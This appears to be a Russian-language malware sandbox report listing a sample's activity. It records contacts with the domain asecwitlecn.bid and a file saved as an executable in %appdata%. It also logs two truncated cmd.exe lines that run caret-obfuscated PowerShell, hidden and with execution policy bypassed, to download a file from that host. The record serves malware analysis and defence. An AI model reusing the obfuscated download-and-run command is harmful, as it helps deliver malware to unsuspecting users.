Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWE^RSH^el^l^.E^xe -^Exe^cu^Tio^np^ol^I^c^y b^YpA^Ss -N^opRO^f^il^e -W^i^ND^OwStYL^E ^HI^DDen ^(^n^ew^-o^b^j^e^c^T s^y^sTEM.NET.w^E^bC^lIE^NT)^.dOWN^LOA^dFIle(^'http://asecwi...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "p^oWE^RSH^el^l^.E^xe -^Exe^cu^Tio^np^ol^I^c^y b^YpA^Ss -N^opRO^f^il^e -W^i^ND^OwStYL^E ^HI^DDen ^(^n^ew^-o^b^j^e^c^T s^y^sTEM.NET.w^E^bC^lIE^NT)^.dOWN^LOA^dFIle(^'http://asecwi...' (со скрытым окном)